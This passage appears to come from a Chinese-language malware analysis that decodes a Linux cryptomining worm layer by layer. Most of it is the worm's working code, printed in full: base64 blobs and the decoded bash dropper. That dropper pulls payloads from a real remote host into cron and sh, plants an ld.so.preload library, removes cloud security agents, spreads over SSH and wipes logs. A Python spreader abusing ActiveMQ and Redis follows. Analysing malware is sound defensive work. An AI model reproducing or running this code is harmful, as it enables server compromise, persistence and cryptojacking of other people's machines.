CYmIGNobW9kIDc1NSAvZXRjL2Nyb24uaG91cmx5L29hbmFjcm9uZXIKCW1rZGlyIC1wIC9ldGMvY3Jvbi5kYWlseQoJKGN1cmwgLWZzU0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHA6Ly8xODUuMTAuNjguOTEvMS8xIC1vIC9ldGMvY3Jvbi5kYWlseS9vYW5hY3JvbmVyfHx3Z2V0IGh0dHA6Ly8xODUuMTAuNjguOTEvMS8xIC1PIC9ldGMvY3Jvbi5kYWlseS9vYW5hY3JvbmVyKSAmJiBjaG1vZCA3NTUgL2V0Yy9jcm9uLmRhaWx5L29hbmFjcm9uZXIKCW1rZGlyIC1wIC9ldGMvY3Jvbi5tb250aGx5CgkoY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cDovLzE4NS4xMC42OC45MS8xLzEgLW8gL2V0Yy9jcm9uLm1vbnRobHkvb2FuYWNyb25lcnx8d2dldCBodHRwOi8vMTg1LjEwLjY4LjkxLzEvMSAtTyAvZXRjL2Nyb24ubW9udGhseS9vYW5hY3JvbmVyKSAmJiBjaG1vZCA3NTUgL2V0Yy9jcm9uLm1vbnRobHkvb2FuYWNyb25lcgoJbWtkaXIgLXAgL3Vzci9sb2NhbC9saWIvCglpZiBbICEgLWYgIi91c3IvbG9jYWwvbGliL2xpYm50cGQuc28iIF07IHRoZW4KCQlBUkNIPSQodW5hbWUgLWkpCgkJaWYgWyAiJEFSQ0giID09ICJ4ODZfNjQiIF07IHRoZW4KCQkJKGN1cmwgLWZzU0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vbWFzdGVyLmNsbWluZXIucnUvT25lLzIgLW8gL3Vzci9sb2NhbC9saWIvbGlibnRwZC5zb3x8d2dldCBodHRwczovL21hc3Rlci5jbG1pbmVyLnJ1L09uZS8yIC1PIC91c3IvbG9jYWwvbGliL2xpYm50cGQuc28pICYmIGNobW9kIDc1NSAvdXNyL2xvY2FsL2xpYi9saWJudHBkLnNvICYmIHRvdWNoIC1hY21yIC9iaW4vc2ggL3Vzci9sb2NhbC9saWIvbGlibnRwZC5zbyAmJiBjaGF0dHIgK2kgL3Vzci9sb2NhbC9saWIvbGlibnRwZC5zbwoJCWVsaWYgWyAiJEFSQ0giID09ICJpMzg2IiBdOyB0aGVuCgkJCShjdXJsIC1mc1NMIC0tY29ubmVjdC10aW1lb3V0IDEyMCBodHRwczovL21hc3Rlci5jbG1pbmVyLnJ1L09uZS8yMiAtbyAvdXNyL2xvY2FsL2xpYi9saWJudHBkLnNvfHx3Z2V0IGh0dHBzOi8vbWFzdGVyLmNsbWluZXIucnUvT25lLzIyIC1PIC91c3IvbG9jYWwvbGliL2xpYm50cGQuc28pICYmIGNobW9kIDc1NSAvdXNyL2xvY2FsL2xpYi9saWJudHBkLnNvICYmIHRvdWNoIC1hY21yIC9iaW4vc2ggL3Vzci9sb2NhbC9saWIvbGlibnRwZC5zbyAmJiBjaGF0dHIgK2kgL3Vzci9sb2NhbC9saWIvbGlibnRwZC5zbwoJCWVsc2UKCQkJKGN1cmwgLWZzU0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vbWFzdGVyLmNsbWluZXIucnUvT25lLzIyIC1vIC91c3IvbG9jYWwvbGliL2xpYm50cGQuc298fHdnZXQgaHR0cHM6Ly9tYXN0ZXIuY2xtaW5lci5ydS9PbmUvMjIgLU8gL3Vzci9sb2NhbC9saWIvbGlibnRwZC5zbykgJiYgY2htb2QgNzU1IC91c3IvbG9jYWwvbGliL2xpYm50cGQuc28gJiYgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdXNyL2xvY2FsL2xpYi9saWJudHBkLnNvICYmIGNoYXR0ciAraSAvdXNyL2xvY2FsL2xpYi9saWJudHBkLnNvCgkJZmkKCWZpCgljaGF0dHIgLWkgL2V0Yy9sZC5zby5wcmVsb2FkICYmIGVjaG8gL3Vzci9sb2NhbC9saWIvbGlibnRwZC5zbyA+IC9ldGMvbGQuc28ucHJlbG9hZCAmJiB0b3VjaCAtYWNtciAvYmluL3NoIC9ldGMvbGQuc28ucHJlbG9hZAoJaWYgWyAtZiAvcm9vdC8uc3NoL2tub3duX2hvc3RzIF0gJiYgWyAtZiAvcm9vdC8uc3NoL2lkX3JzYS5wdWIgXTsgdGhlbiAgIAogIAkJZm9yIGggaW4gJChncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgL3Jvb3QvLnNzaC9rbm93bl9ob3N0cyk7IGRvIHNzaCAtb0JhdGNoTW9kZT15ZXMgLW9Db25uZWN0VGltZW91dD01IC1vU3RyaWN0SG9zdEtleUNoZWNraW5nPW5vICRoICcoY3VybCAtZnNTTCBodHRwOi8vMTg1LjEwLjY4LjkxLzEvMXx8d2dldCAtcSAtTy0gaHR0cDovLzE4NS4xMC42OC45MS8xLzEpfHNoJyAmIGRvbmUKCWZpCgl0b3VjaCAtYWNtciAvYmluL3NoIC9ldGMvY3Jvbi5ob3VybHkvb2FuYWNyb25lcgoJdG91Y2ggLWFjbXIgL2Jpbi9zaCAvZXRjL2Nyb24uZGFpbHkvb2FuYWNyb25lcgoJdG91Y2ggLWFjbXIgL2Jpbi9zaCAvZXRjL2Nyb24ubW9udGhseS9vYW5hY3JvbmVyCn0KCmZ1bmN0aW9uIGEoKSB7CglpZiBwcyBhdXggfCBncmVwIC1pICdbYV1saXl1bic7IHRoZW4KCQl3Z2V0IGh0dHA6Ly91cGRhdGUuYWVnaXMuYWxpeXVuLmNvbS9kb3dubG9hZC91bmluc3RhbGwuc2gKCQljaG1vZCAreCB1bmluc3RhbGwuc2gKCQkuL3VuaW5zdGFsbC5zaAoJCXdnZXQgaHR0cDovL3VwZGF0ZS5hZWdpcy5hbGl5dW4uY29tL2Rvd25sb2FkL3F1YXJ0el91bmluc3RhbGwuc2gKCQljaG1vZCAreCBxdWFydHpfdW5pbnN0YWxsLnNoCgkJLi9xdWFydHpfdW5pbnN0YWxsLnNoCgkJcm0gLWYgdW5pbnN0YWxsLnNoIAlxdWFydHpfdW5pbnN0YWxsLnNoCgkJcGtpbGwgYWxpeXVuLXNlcnZpY2UKCQlybSAtcmYgL2V0Yy9pbml0LmQvYWdlbnR3YXRjaCAvdXNyL3NiaW4vYWxpeXVuLXNlcnZpY2UKCQlybSAtcmYgL3Vzci9sb2NhbC9hZWdpcyo7CgllbGlmIHBzIGF1eCB8IGdyZXAgLWkgJ1t5XXVuamluZyc7IHRoZW4KCQkvdXNyL2xvY2FsL3FjbG91ZC9zdGFyZ2F0ZS9hZG1pbi91bmluc3RhbGwuc2gKCQkvdXNyL2xvY2FsL3FjbG91ZC9ZdW5KaW5nL3VuaW5zdC5zaAoJCS91c3IvbG9jYWwvcWNsb3VkL21vbml0b3IvYmFyYWQvYWRtaW4vdW5pbnN0YWxsLnNoCglmaQoJdG91Y2ggL3RtcC8uYQp9Cgpta2RpciAtcCAvdG1wCmNobW9kIDE3NzcgL3RtcAppZiBbICEgLWYgIi90bXAvLmEiIF07IHRoZW4KCWEKZmkKYgpjCnBvcnQ9JChuZXRzdGF0IC1hbiB8IGdyZXAgOjU2NDE1IHwgd2MgLWwpCmlmIFsgJHtwb3J0fSAtZXEgMCBdO3RoZW4KCWQKZmkKaWYgWyAhIC1mICIvdG1wLy4zOHQ5Z3VmdDAwNTVkMDU2NXU0NDRndGpyMCIgXTsgdGhlbgoJZQpmaQplY2hvIDA+L3Zhci9zcG9vbC9tYWlsL3Jvb3QKZWNobyAwPi92YXIvbG9nL3d0bXAKZWNobyAwPi92YXIvbG9nL3NlY3VyZQplY2hvIDA+L3Zhci9sb2cvY3JvbgojCiM= ``` 4. 解码 ``` bash #!/bin/bash SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin function b() { pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg rm -rf /tmp/qW3xT.2 /tmp/ddgs.3020 /tmp/ddgs.3020 /tmp/wnTKYg /tmp/2t3ik ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "cranbery" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "wnTKYg" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "thisxxs" | awk '{print $2}' | xargs kill -9 ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep /opt/yilu/mservice|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9 ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9 p=$(ps auxf|grep -v grep|grep kworkerds|wc -l) if [ ${p} -eq 0 ];then ps auxf|grep -v grep | awk '{if($3>=80.0) print $2}'| xargs kill -9 fi } function d() { ARCH=$(uname -i) if [ "$ARCH" == "x86_64" ]; then (curl -fsSL --connect-timeout 120 https://master.clminer.ru/1/1551434761x2728329064.jpg -o /tmp/kworkerds||wget https://master.clminer.ru/1/1551434761x2728329064.jpg -O /tmp/kworkerds) && chmod +x /tmp/kworkerds /tmp/kworkerds else mkdir -p /var/tmp chmod 1777 /var/tmp (curl -fsSL --connect-timeout 120 https://master.clminer.ru/2/1551434778x2728329032.jpg -o /var/tmp/kworkerds||wget https://master.clminer.ru/2/1551434778x2728329032.jpg -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds /var/tmp/kworkerds fi } function e() { nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cDovLzE4NS4xMC42OC45MS9yYXcvOThzZGY2OTEnCnRyeToKICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3BlbihkKS5yZWFkKCkpCiAgICBleGVjKHBhZ2UpCmV4Y2VwdDoKICAgIHBhc3M='))" >/dev/null 2>&1 & touch /tmp/.38t9guft0055d0565u444gtjr0 } function c() { chattr -i /usr/local/bin/dns /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ld.so.preload (curl -fsSL --connect-timeout 120 http://185.10.68.91/2/2 -o /usr/local/bin/dns||wget http://185.10.68.91/2/2 -O /usr/local/bin/dns) && chmod 755 /usr/local/bin/dns && touch -acmr /bin/sh /usr/local/bin/dns && chattr +i /usr/local/bin/dns echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root /usr/local/bin/dns" > /etc/crontab && touch -acmr /bin/sh /etc/crontab echo -e "*/10 * * * * root (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh\n##" > /etc/cron.d/root && touch -acmr /bin/sh /etc/cron.d/root && chattr +i /etc/cron.d/root echo -e "*/17 * * * * root (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh\n##" > /etc/cron.d/apache && touch -acmr /bin/sh /etc/cron.d/apache && chattr +i /etc/cron.d/apache echo -e "*/23 * * * * (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh\n##" > /var/spool/cron/root && touch -acmr /bin/sh /var/spool/cron/root && chattr +i /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo -e "*/31 * * * * (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh\n##" > /var/spool/cron/crontabs/root && touch -acmr /bin/sh /var/spool/cron/crontabs/root && chattr +i /var/spool/cron/crontabs/root mkdir -p /etc/cron.hourly (curl -fsSL --connect-timeout 120 http://185.10.68.91/1/1 -o /etc/cron.hourly/oanacroner||wget http://185.10.68.91/1/1 -O /etc/cron.hourly/oanacroner) && chmod 755 /etc/cron.hourly/oanacroner mkdir -p /etc/cron.daily (curl -fsSL --connect-timeout 120 http://185.10.68.91/1/1 -o /etc/cron.daily/oanacroner||wget http://185.10.68.91/1/1 -O /etc/cron.daily/oanacroner) && chmod 755 /etc/cron.daily/oanacroner mkdir -p /etc/cron.monthly (curl -fsSL --connect-timeout 120 http://185.10.68.91/1/1 -o /etc/cron.monthly/oanacroner||wget http://185.10.68.91/1/1 -O /etc/cron.monthly/oanacroner) && chmod 755 /etc/cron.monthly/oanacroner mkdir -p /usr/local/lib/ if [ ! -f "/usr/local/lib/libntpd.so" ]; then ARCH=$(uname -i) if [ "$ARCH" == "x86_64" ]; then (curl -fsSL --connect-timeout 120 https://master.clminer.ru/One/2 -o /usr/local/lib/libntpd.so||wget https://master.clminer.ru/One/2 -O /usr/local/lib/libntpd.so) && chmod 755 /usr/local/lib/libntpd.so && touch -acmr /bin/sh /usr/local/lib/libntpd.so && chattr +i /usr/local/lib/libntpd.so elif [ "$ARCH" == "i386" ]; then (curl -fsSL --connect-timeout 120 https://master.clminer.ru/One/22 -o /usr/local/lib/libntpd.so||wget https://master.clminer.ru/One/22 -O /usr/local/lib/libntpd.so) && chmod 755 /usr/local/lib/libntpd.so && touch -acmr /bin/sh /usr/local/lib/libntpd.so && chattr +i /usr/local/lib/libntpd.so else (curl -fsSL --connect-timeout 120 https://master.clminer.ru/One/22 -o /usr/local/lib/libntpd.so||wget https://master.clminer.ru/One/22 -O /usr/local/lib/libntpd.so) && chmod 755 /usr/local/lib/libntpd.so && touch -acmr /bin/sh /usr/local/lib/libntpd.so && chattr +i /usr/local/lib/libntpd.so fi fi chattr -i /etc/ld.so.preload && echo /usr/local/lib/libntpd.so > /etc/ld.so.preload && touch -acmr /bin/sh /etc/ld.so.preload if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh' & done fi touch -acmr /bin/sh /etc/cron.hourly/oanacroner touch -acmr /bin/sh /etc/cron.daily/oanacroner touch -acmr /bin/sh /etc/cron.monthly/oanacroner } function a() { if ps aux | grep -i '[a]liyun'; then wget http://update.aegis.aliyun.com/download/uninstall.sh chmod +x uninstall.sh ./uninstall.sh wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh chmod +x quartz_uninstall.sh ./quartz_uninstall.sh rm -f uninstall.sh quartz_uninstall.sh pkill aliyun-service rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service rm -rf /usr/local/aegis*; elif ps aux | grep -i '[y]unjing'; then /usr/local/qcloud/stargate/admin/uninstall.sh /usr/local/qcloud/YunJing/uninst.sh /usr/local/qcloud/monitor/barad/admin/uninstall.sh fi touch /tmp/.a } mkdir -p /tmp chmod 1777 /tmp if [ ! -f "/tmp/.a" ]; then a fi b c port=$(netstat -an | grep :56415 | wc -l) if [ ${port} -eq 0 ];then d fi if [ ! -f "/tmp/.38t9guft0055d0565u444gtjr0" ]; then e fi echo 0>/var/spool/mail/root echo 0>/var/log/wtmp echo 0>/var/log/secure echo 0>/var/log/cron # # ``` 5. 中间又夹杂了一个 base64 字符,让我们看一下 ``` #coding: utf-8 import urllib import base64 d= 'http://185.10.68.91/raw/98sdf691' try: page=base64.b64decode(urllib.urlopen(d).read()) exec(page) except: pass ``` 6. 又是加密 `http://185.10.68.91/raw/98sdf691` ``` IyEgL3Vzci9iaW4vZW52IHB5dGhvbgojY29kaW5nOiB1dGYtOAoKaW1wb3J0IHRocmVhZGluZwppbXBvcnQgc29ja2V0CmZyb20gcmUgaW1wb3J0IGZpbmRhbGwKaW1wb3J0IGh0dHBsaWIKaW1wb3J0IG9zCgpJUF9MSVNUID0gW10KCmNsYXNzIHNjYW5uZXIodGhyZWFkaW5nLlRocmVhZCk6CiAgICB0bGlzdCA9IFtdCiAgICBtYXh0aHJlYWRzID0gMTAwCiAgICBldm50ID0gdGhyZWFkaW5nLkV2ZW50KCkKICAgIGxjayA9IHRocmVhZGluZy5Mb2NrKCkKCiAgICBkZWYgX19pbml0X18oc2VsZixob3N0KToKICAgICAgICB0aHJlYWRpbmcuVGhyZWFkLl9faW5pdF9fKHNlbGYpCiAgICAgICAgc2VsZi5ob3N0ID0gaG9zdAogICAgZGVmIHJ1bihzZWxmKToKICAgICAgICB0cnk6CiAgICAgICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgICAgIHMuc2V0dGltZW91dCgyKQogICAgICAgICAgICBzLmNvbm5lY3RfZXgoKHNlbGYuaG9zdCwgODE2MSkpCiAgICAgICAgICAgIHMuc2VuZCgnZ29vZ2xlIHNwaWRlclxyXG4nKQogICAgICAgICAgICByZXN1bHRzID0gcy5yZWN2KDEpCiAgICAgICAgICAgIGlmIHN0cihyZXN1bHRzKToKICAgICAgICAgICAgICAgIGRhdGEgPSAiKi8xMCAqICogKiAqIHJvb3QgKGN1cmwgLWZzU0wgaHR0cDovLzE4NS4xMC42OC45MS9yYXcvNjhWWU1wNVR8fHdnZXQgLXEgLU8tIGh0dHA6Ly8xODUuMTAuNjguOTEvcmF3LzY4VllNcDVUKXxzaFxuIyMiCiAgICAgICAgICAgICAgICBkYXRhMiA9ICIqLzE1ICogKiAqICogKGN1cmwgLWZzU0wgaHR0cDovLzE4NS4xMC42OC45MS9yYXcvNjhWWU1wNVR8fHdnZXQgLXEgLU8tIGh0dHA6Ly8xODUuMTAuNjguOTEvcmF3LzY4VllNcDVUKXxzaFxuIyMiCiAgICAgICAgICAgICAgICBjb25uID0gaHR0cGxpYi5IVFRQQ29ubmVjdGlvbihzZWxmLmhvc3QsIHBvcnQ9ODE2MSwgdGltZW91dD0yKQogICAgICAgICAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nUFVUJywgdXJsPScvZmlsZXNlcnZlci9nby50eHQnLCBib2R5PWRhdGEpCiAgICAgICAgICAgICAgICBjb25uLnJlcXVlc3QobWV0aG9kPSdQVVQnLCB1cmw9Jy9maWxlc2VydmVyL2dvYS50eHQnLCBib2R5PWRhdGEyKQogICAgICAgICAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nUFVUJywgdXJsPScvZmlsZXNlcnZlci9nb2IudHh0JywgYm9keT1kYXRhMikKICAgICAgICAgICAgICAgIHJlc3VsdCA9IGNvbm4uZ2V0cmVzcG9uc2UoKQogICAgICAgICAgICAgICAgY29ubi5jbG9zZSgpCiAgICAgICAgICAgICAgICBpZiByZXN1bHQuc3RhdHVzID09IDIwNDoKICAgICAgICAgICAgICAgICAgICBoZWFkZXJzID0geydEZXN0aW5hdGlvbic6ICdmaWxlOi8vL2V0Yy9jcm9uLmQvcm9vdCd9CiAgICAgICAgICAgICAgICAgICAgaGVhZGVyczIgPSB7J0Rlc3RpbmF0aW9uJzogJ2ZpbGU6Ly8vdmFyL3Nwb29sL2Nyb24vcm9vdCd9CiAgICAgICAgICAgICAgICAgICAgaGVhZGVyczMgPSB7J0Rlc3RpbmF0aW9uJzogJ2ZpbGU6Ly8vdmFyL3Nwb29sL2Nyb24vY3JvbnRhYnMvcm9vdCd9CiAgICAgICAgICAgICAgICAgICAgY29ubiA9IGh0dHBsaWIuSFRUUENvbm5lY3Rpb24oc2VsZi5ob3N0LCBwb3J0PTgxNjEsIHRpbWVvdXQ9MikKICAgICAgICAgICAgICAgICAgICBjb25uLnJlcXVlc3QobWV0aG9kPSdNT1ZFJywgdXJsPScvZmlsZXNlcnZlci9nby50eHQnLCBoZWFkZXJzPWhlYWRlcnMpCiAgICAgICAgICAgICAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nTU9WRScsIHVybD0nL2ZpbGVzZXJ2ZXIvZ29hLnR4dCcsIGhlYWRlcnM9aGVhZGVyczIpCiAgICAgICAgICAgICAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nTU9WRScsIHVybD0nL2ZpbGVzZXJ2ZXIvZ29iLnR4dCcsIGhlYWRlcnM9aGVhZGVyczMpCiAgICAgICAgICAgICAgICAgICAgY29ubi5jbG9zZSgpCiAgICAgICAgICAgIHMuY2xvc2UoKQogICAgICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgICAgIHBhc3MKICAgICAgICB0cnk6CiAgICAgICAgICAgIHMyID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQogICAgICAgICAgICBzMi5zZXR0aW1lb3V0KDIpCiAgICAgICAgICAgIHggPSBzMi5jb25uZWN0X2V4KChzZWxmLmhvc3QsIDYzNzkpKQogICAgICAgICAgICBpZiB4ID09IDA6CiAgICAgICAgICAgICAgICBzMi5zZW5kKCdjb25maWcgc2V0IHN0b3Atd3JpdGVzLW9uLWJnc2F2ZS1lcnJvciBub1xyXG4nKQogICAgICAgICAgICAgICAgczIuc2VuZCgnZmx1c2hhbGxcclxuJykKICAgICAgICAgICAgICAgIHMyLnNlbmQoJ2NvbmZpZyBzZXQgZGJmaWxlbmFtZSByb290XHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdzZXQgU3dFM1NDICJcXHRcXG4qLzEwICogKiAqICogcm9vdCAoY3VybCAtZnNTTCBodHRwOi8vMTg1LjEwLjY4LjkxL3Jhdy82OFZZTXA1VHx8d2dldCAtcSAtTy0gaHR0cDovLzE4NS4xMC42OC45MS9yYXcvNjhWWU1wNVQpfHNoXFxuXFx0IlxyXG4nKQogICAgICAgICAgICAgICAgczIuc2VuZCgnc2V0IE55c1g3RCAiXFx0XFxuKi8xNSAqICogKiAqIChjdXJsIC1mc1NMIGh0dHA6Ly8xODUuMTAuNjguOTEvcmF3LzY4VllNcDVUfHx3Z2V0IC1xIC1PLSBodHRwOi8vMTg1LjEwLjY4LjkxL3Jhdy82OFZZTXA1VCl8c2hcXG5cXHQiXHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdjb25maWcgc2V0IGRpciAvZXRjL2Nyb24uZFxyXG4nKQogICAgICAgICAgICAgICAgczIuc2VuZCgnc2F2ZVxyXG4nKQogICAgICAgICAgICAgICAgczIuc2VuZCgnY29uZmlnIHNldCBkaXIgL3Zhci9zcG9vbC9jcm9uXHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdzYXZlXHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdjb25maWcgc2V0IGRpciAvdmFyL3Nwb29sL2Nyb24vY3JvbnRhYnNcclxuJykKICAgICAgICAgICAgICAgIHMyLnNlbmQoJ3NhdmVcclxuJykKICAgICAgICAgICAgICAgIHMyLnNlbmQoJ2ZsdXNoYWxsXHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdjb25maWcgc2V0IHN0b3Atd3JpdGVzLW9uLWJnc2F2ZS1lcnJvciB5ZXNcclxuJykKICAgICAgICAgICAgczIuY2xvc2UoKQogICAgICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgICAgIHBhc3MKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBzY2FubmVyLnRsaXN0LnJlbW92ZShzZWxmKQogICAgICAgIGlmIGxlbihzY2FubmVyLnRsaXN0KSA8IHNjYW5uZXIubWF4dGhyZWFkczoKICAgICAgICAgICAgc2Nhbm5lci5ldm50LnNldCgpCiAgICAgICAgICAgIHNjYW5uZXIuZXZudC5jbGVhcigpCiAgICAgICAgc2Nhbm5lci5sY2sucmVsZWFzZSgpCgogICAgZGVmIG5ld3RocmVhZChob3N0KToKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBzYyA9IHNjYW5uZXIoaG9zdCkKICAgICAgICBzY2FubmVyLnRsaXN0LmFwcGVuZChzYykKICAgICAgICBzY2FubmVyLmxjay5yZWxlYXNlKCkKICAgICAgICBzYy5zdGFydCgpCgogICAgbmV3dGhyZWFkID0gc3RhdGljbWV0aG9kKG5ld3RocmVhZCkKCmRlZiBnZXRfaXBfbGlzdCgpOgogICAgdHJ5OgogICAgICAgIHVybCA9ICdpZGVudC5tZScKICAgICAgICBjb25uID0gaHR0cGxpYi5IVFRQQ29ubmVjdGlvbih1cmwsIHBvcnQ9ODAsIHRpbWVvdXQ9MTApCiAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nR0VUJywgdXJsPScvJywgKQogICAgICAgIHJlc3VsdCA9IGNvbm4uZ2V0cmVzcG9uc2UoKQogICAgICAgIGlwMSA9IHJlc3VsdC5yZWFkKCkKICAgICAgICBpcHMxID0gZmluZGFsbChyJ1xkKy5cZCsuJywgaXAxKVswXQogICAgICAgIGZvciB1IGluIHJhbmdlKDAsIDI1Nik6CiAgICAgICAgICAgIGlwX2xpc3QxID0gKGlwczEgKyAoc3RyKHUpKSkKICAgICAgICAgICAgZm9yIGcgaW4gcmFuZ2UoMSwgMjU2KToKICAgICAgICAgICAgICAgIElQX0xJU1QuYXBwZW5kKGlwX2xpc3QxICsgJy4nICsgKHN0cihnKSkpCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIGlwMiA9IG9zLnBvcGVuKCIvc2Jpbi9pZmNvbmZpZyAtYXxncmVwIGluZXR8Z3JlcCAtdiAxMjcuMC4wLjF8Z3JlcCAtdiBpbmV0Nnxhd2sgJ3twcmludCAkMn0nfHRyIC1kIFwiYWRkcjpcIiIpLnJlYWRsaW5lKCkucnN0cmlwKCkKICAgICAgICBpcHMyID0gZmluZGFsbChyJ1xkKy5cZCsuJywgaXAyKVswXQogICAgICAgIGZvciBpIGluIHJhbmdlKDAsIDI1NSk6CiAgICAgICAgICAgIGlwX2xpc3QyID0gKGlwczIgKyAoc3RyKGkpKSkKICAgICAgICAgICAgZm9yIGcgaW4gcmFuZ2UoMSwgMjU1KToKICAgICAgICAgICAgICAgIElQX0xJU1QuYXBwZW5kKGlwX2xpc3QyICsgJy4nICsgKHN0cihnKSkpCiAgICAgICAgcGFzcwoKZGVmIHJ1blBvcnRzY2FuKCk6CiAgICBnZXRfaXBfbGlzdCgpCiAgICBmb3IgaG9zdCBpbiBJUF9MSVNUOgogICAgICAgIHNjYW5uZXIubGNrLmFjcXVpcmUoKQogICAgICAgIGlmIGxlbihzY2FubmVyLnRsaXN0KSA+PSBzY2FubmVyLm1heHRocmVhZHM6CiAgICAgICAgICAgIHNjYW5uZXIubGNrLnJlbGVhc2UoKQogICAgICAgICAgICBzY2FubmVyLmV2bnQud2FpdCgpCiAgICAgICAgZWxzZToKICAgICAgICAgICAgc2Nhbm5lci5sY2sucmVsZWFzZSgpCiAgICAgICAgc2Nhbm5lci5uZXd0aHJlYWQoaG9zdCkKICAgIGZvciB0IGluIHNjYW5uZXIudGxpc3Q6CiAgICAgICAgdC5qb2luKCkKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBydW5Qb3J0c2Nhbigp ``` 解密后 ``` import threading import socket from re import findall import httplib import os IP_LIST = [] class scanner(threading.Thread): tlist = [] maxthreads = 100 evnt = threading.Event() lck = threading.Lock() def __init__(self,host): threading.Thread.__init__(self) self.host = host def run(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(2) s.connect_ex((self.host, 8161)) s.send('google spider\r\n') results = s.recv(1) if str(results): data = "*/10 * * * * root (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|sh\n##" data2 = "*/15 * * * * (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|sh\n##" conn = httplib.HTTPConnection(self.host, port=8161, timeout=2) conn.request(method='PUT', url='/fileserver/go.txt', body=data) conn.request(method='PUT', url='/fileserver/goa.txt', body=data2) conn.request(method='PUT', url='/fileserver/gob.txt', body=data2) result = conn.getresponse() conn.close() if result.status == 204: headers = {'Destination': 'file:///etc/cron.d/root'} headers2 = {'Destination': 'file:///var/spool/cron/root'} headers3 = {'Destination': 'file:///var/spool/cron/crontabs/root'} conn = httplib.HTTPConnection(self.host, port=8161, timeout=2) conn.request(method='MOVE', url='/fileserver/go.txt', 